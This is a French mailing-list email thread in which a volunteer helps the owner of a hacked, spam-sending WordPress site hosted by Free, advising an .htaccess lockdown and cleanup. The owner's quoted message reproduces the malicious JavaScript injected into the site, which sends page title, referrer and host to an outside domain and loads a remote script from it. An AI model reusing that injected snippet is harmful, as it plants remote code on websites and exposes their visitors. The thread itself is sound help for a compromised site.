<html>
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
</head>
<body bgcolor="#FFFFFF" text="#000000">
Salut,<br>
<br>
Pour se rencontrer physiquement, ça aurait été un plaisir de te
filer un coup de main, main ca risque d'être compliqué, vu que je
suis parti jusqu'à Bamako (Mali). Si tu as besoin tu peut tenter de
m’appeler au 05 82 880 880 (c'est un numéro français tarif normal
redirigé via VOIP sur mon ordinateur si je suis connecté au moment
ou tu appelles. Si je suis connecté tu pourras me joindre dessus.))<br>
<br>
Il faut faire deux choses:<br>
<br>
<b>1/ réactiver ton accès </b><br>
Normalement, tu doit pouvoir faire ça depuis les pages de gestion de
ton compte Free.<br>
*ATTENTION* Le problème n'est pas résolu et l'envoi de spam ouvert
par le hacker va reprendre si tu ne refermes pas la porte qu'il a
ouverte... Et si ça reprend free va te suspendre à nouveau.<br>
Une fois que tu aura récupéré ton accès FTP, je te conseille
d'ajouter les deux lignes suivantes au début du fichier .htaccess
situé à la base de ton hébergement:<br>
<br>
DENY FROM ALL<br>
ALLOW FROM 1.2.3.4<br>
<br>
(remplace 1.2.3.4) par ton adresse IP. Cela restreindra l’accès HTTP
à ton site à ta seule adresse IP. Ca te permettra de le réparer
tranquillement, sans risquer que le hacker ne renvoie du spam et que
ton site soit à nouveau bloqué par Free.<br>
<br>
<b>2/ Nettoyer ton site</b><br>
<br>
Mettre ton site à jour est une bonne chose: ça supprimera la faille
de sécurité via laquelle le pirate est entré et à installé ses
fichiers, mais ça ne sufira pas: il a déjà installé son système
d'envoi de spam sur ton site.<br>
<br>
Cherche sur google "réparer wordpress hacké", tu trouvera plein de
tutos à ce sujet. Ca te permetra de remetre ton site dans l'état où
il était avant que tu te fasses hacker (c'est à dire, virer ce que
le hacker à rajouté sur ton site)<br>
<br>
Une fois que tu auras fait le nécessaire (et pas avant), tu peut
enlever les deux lignes de ton .htaccess que tu avait ajouté.
(surtout le DENY FROM ALL) afin que tu site soit de nouveau
accessible à tout le monde (c'est le but, hein...)<br>
<br>
Julien<br>
<br>
<br>
<br>
<br>
<br>
<div class="moz-signature"><img
src="cid:part1.09080108.07020605@tuxfamily.org">
<div style="margin-left: 7px; display: inline-block; color:
#555555; font-family:cursive;"><font size="+2">Malinux Télé</font><br>
Donner l’accès aux logiciels libres éducatifs aux enfants du
Mali et d’ailleurs<br>
<a style="color:#555555" href="http://malinuxtele.tuxfamily.org">http://malinuxtele.tuxfamily.org</a>
</div>
</div>
<div class="moz-cite-prefix">Le 29/01/2016 15:15, Camille à barbe a
écrit :<br>
</div>
<blockquote cite="mid:56AB8228.3080800@free.fr" type="cite">
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
<div class="moz-cite-prefix">Salut Julien,<br>
Merci de m'avoir répondu. Je ne faisais pas d'envois de mails,
et j'ai effectivement constaté que des fichiers apparaissaient
sur mon site. J'ai l'habitude d'utiliser filezilla pour uploader
des fichiers et contourner quelques limites imposées par
wordpress. Je constate que je ne peux plus me connecter en ftp à
mon site. Serait-il possible qu'on prenne rendez-vous pour
essayer de régler ça ensemble : je me sens perdu et j'ai un mode
de vie particulier, un peu précaire en ce moment, qui fait que
je voudrais régler ça rapidement. Tu accepterais qu'on se
rencontre pour voir ça ensemble ?<br>
<br>
Le 29/01/2016 15:27, Julien Marin a écrit :<br>
</div>
<blockquote cite="mid:56AB76C9.1010704@tuxfamily.org" type="cite">
<meta content="text/html; charset=utf-8"
http-equiv="Content-Type">
<div class="moz-cite-prefix">Salut camille,<br>
<br>
Un envoi de spam peut signifier:<br>
<ul>
<li>Soit que tu as envoyé beaucoup de mail (type newsletter)
depuis le site et que des gens soient allés se plaindre à
free (beaucoup ne font la différente entre un mail
militant et une pub pour du viagra, du moment qu'il n'a
pas été désiré, c'est triste mais c'est comme ça)</li>
<li>Soit que ton wordpress a du être hacké par des spammeurs
qui s'en sont servi pour envoyer du spam.</li>
</ul>
<p>Si c'est cette deuxième hypothèse, les pirates ont du
profiter d'une faille wordpress (ou d'un code d'accès à
l'interface d'administration facile à trouver) pour prendre
la main sur ton site, y installer un module de mass-mailing,
et balancer à tout va des pub diverses avant que free ne te
bloque...<br>
</p>
<p>Dans ce cas, il ne s'agit pas d'un hack à visée politique
visant le site en tant que tel, mais d'une attaque
automatisée cherchant dans la masse de site, lesquels
présenteraient une vulnérabilité connue, afin d'en profiter
pour émettre du spam.<br>
</p>
<p>Un moyen de le vérifier si tu as été hackée, est de te
promener dans le FTP de ton site, si tu voies des fichier en
.php (les exécutables de ton site web) modifiés récemment,
c'est que qqn a du trouver un moyen d'injecter ses propres
scripts (a fins d'envoi de spam) sur ton site.<br>
</p>
<p>Si c'est le cas, il ne faudra d'abord "nettoyer" ton
installation de wordpress avant remise en ligne<br>
</p>
<p>JUlien<br>
</p>
<p><br>
</p>
<div class="moz-signature"><img
src="cid:part3.08070601.05020006@tuxfamily.org">
<div style="margin-left: 7px; display: inline-block; color:
#555555; font-family:cursive;"><font size="+2">Malinux
Télé</font><br>
Donner l’accès aux logiciels libres éducatifs aux enfants
du Mali et d’ailleurs<br>
<a moz-do-not-send="true" style="color:#555555"
href="http://malinuxtele.tuxfamily.org">http://malinuxtele.tuxfamily.org</a>
</div>
</div>
<p> </p>
<br>
Le 29/01/2016 13:34, Camille à barbe via Toulouse-ll a écrit :<br>
</div>
<blockquote cite="mid:56AB6A6E.7090405@free.fr" type="cite">Bonjour,
<br>
Je gère (comme je peux) un site internet hébergé par free,
propulsé par <br>
wordpress 3.1.4. <br>
<br>
<br>
Pourquoi je voudrais le remettre en place ? <br>
Je l'ai mis en place pour faire suite à une inculpation au
sujet d'une action <br>
menée à Notre-Dame-des-Landes qui nous a valu deux procès
avant d'être relaxés. <br>
Pour en savoir davantage, il reste un embryon de site que
j'avais mis en place <br>
pour préparer le premier procès :<a moz-do-not-send="true"
class="moz-txt-link-freetext"
href="http://kamyas1naz.free.fr/photos.htm">http://kamyas1naz.free.fr/photos.htm</a>
<br>
ainsi que la page facebook associée :<a moz-do-not-send="true"
class="moz-txt-link-freetext"
href="https://www.facebook.com/kamyapoil/">https://www.facebook.com/kamyapoil/</a>
<br>
Je poursuis cette démarche et ce site m'est utile pour
présenter les actions <br>
déjà menées et en préparer d'autres. <br>
<br>
<br>
Pourquoi free a suspendu le compte ? <br>
J'ai reçu ce message de la part de free le 27 janvier : <br>
<br>
<br>
"Bonjour, <br>
<br>
Ce courrier électronique vous est adressé pour vous indiquer
que votre compte <br>
Pages Perso kamyapoil a été suspendu pour la raison suivante :
<br>
<br>
Votre compte envoie du Spam (mail non solicite) via la
fonction php mail() <br>
<br>
Pour lever la suspension, consultez les newsgroups <br>
proxad.free.services.pagesperso pour effectuer les pré-requis
nécessaires à la <br>
ré-activation de votre compte et postez votre demande dans le
fil qui vous sera <br>
indiqué. ( la page d'assistance sur le site de Free vous
donnera les <br>
informations nécessaires pour accéder à ce forum - <br>
<a moz-do-not-send="true" class="moz-txt-link-freetext"
href="http://www.free.fr/assistance/541.html">http://www.free.fr/assistance/541.html</a>
). Aucun support ne sera fait par mail. <br>
<br>
ATTENTION : en l'absence de réaction de votre part dans les
deux mois, votre <br>
compte Pages Perso sera DETRUIT. <br>
<br>
<br>
Cordialement, <br>
Le service Pages Perso." <br>
<br>
J'avais eu un signe avant coureur. A partir du mois d'octobre,
des lignes de codes ont été insérées à mon insu : <br>
<br>
<script>var a=''; setTimeout(10); var default_keyword =
<br>
encodeURIComponent(document.title); var se_referrer = <br>
encodeURIComponent(document.referrer); var host = <br>
encodeURIComponent(window.location.host); var base = <br>
<a moz-do-not-send="true" class="moz-txt-link-rfc2396E"
href="http://megatest.vn/js/jquery.min.php">"http://megatest.vn/js/jquery.min.php"</a>;
var n_url = base + <br>
"?default_keyword=" + default_keyword + "&se_referrer=" +
se_referrer + <br>
"&source=" + host; var f_url = base +
"?c_utt=snt2014&c_utm=" + <br>
encodeURIComponent(n_url); if (default_keyword !== null
&& <br>
default_keyword !== '' && se_referrer !== null
&& se_referrer !== <br>
''){document.write('<script type="text/javascript" src="' +
f_url + '">' <br>
+ '<' + '/script>');}</script> <br>
<br>
Elles se trouvaient dans l'en-tête des feuilles de style et
avaient pour effet de bloquer une dizaine de secondes chaque
page du site qu'on essayait de charger. Je n'y connais
vraiment pas grand chose, mais un sympathisant m'a prévenu du
problème et je les ai effacées. Mais elles revenaient à chaque
fois, une à deux fois par semaine. J'ai pris l'habitude de les
retirer. J'ai modifié le nom d'administrateur et le mot de
passe, mais ça n'a pas réglé le problème. J'ai continué à
effacer ces lignes de code, une à deux fois par semaine. <br>
Je voulais changer les autres mots de passe (base de données,
et je ne sais quoi d'autre), et télécharger une version plus
récente de wordpress puisqu'on n'est plus limité à la version
3.1.4 depuis quelques temps, mais je ne l'ai pas fait par peur
de tout planter : j'espérais trouver quelqu'un pour m'y aider.
Free ne m'a pas laissé davantage de temps pour résoudre le
problème et le site est maintenant suspendu. Je ne comprends
pas comment faire pour accéder à la demande de free. J'ai
rencontré quelqu'un de tetraneutral qui m'a suggéré de me
tourner vers vous. Pouvez vous m'aider ? <br>
<br>
Merci. <br>
<br>
_______________________________________________ <br>
Toulouse-ll mailing list <br>
<a moz-do-not-send="true" class="moz-txt-link-abbreviated"
href="mailto:Toulouse-ll@toulibre.org">Toulouse-ll@toulibre.org</a>
<br>
<a moz-do-not-send="true" class="moz-txt-link-freetext"
href="http://toulibre.org/cgi-bin/mailman/listinfo/toulouse-ll">http://toulibre.org/cgi-bin/mailman/listinfo/toulouse-ll</a><br>
</blockquote>
<br>
</blockquote>
<br>
</blockquote>
<br>
</body>
</html>